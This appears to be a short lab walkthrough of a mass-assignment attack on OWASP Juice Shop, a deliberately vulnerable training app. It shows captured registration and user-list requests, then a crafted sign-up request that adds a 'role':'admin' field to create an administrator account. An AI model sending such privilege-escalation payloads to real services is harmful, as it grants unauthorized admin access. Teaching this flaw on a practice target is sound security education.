
Mass Assignment

Mass assignment occurs when a property of a JSON or request payload is available in an unintended security context.

  1. Review the network traffic generated after creating a user in the OWASP juice shop and note the following request:

     POST https://localhost:88/api/Users/ HTTP/1.1
         "email" : "someone@somewhere.com",
         "password" : "BadPass123",
         "passwordRepeat" : "BadPass123",
         "securityQuestion" : {
             "id" : 7,
             "question" : "Name of your favorite pet?",
             "createdAt" : "2024-03-24T13:50:54.019Z",
             "updatedAt" : "2024-03-24T13:50:54.019Z"
         "securityAnswer" : "Bob"
  2. After logging in, submit a GET request to api\Users and observe the response:

     "status" : "success",
     "data" : [ {
         "id" : 1,
         "username" : "",
         "email" : "admin@juice-sh.op",
         "role" : "admin",
         "deluxeToken" : "",
         "lastLoginIp" : "",
         "profileImage" : "assets/public/images/uploads/defaultAdmin.png",
         "isActive" : true,
         "createdAt" : "2024-03-24T18:39:35.837Z",
         "updatedAt" : "2024-03-24T18:39:35.837Z",
         "deletedAt" : null
     . . .
  3. Note that the role is returned. Attempt to create a new user with the following request:

     POST https://localhost:88/api/Users/ HTTP/1.1
         "email" : "sneakyadmin",
         "password" : "admin",
         "role" : "admin"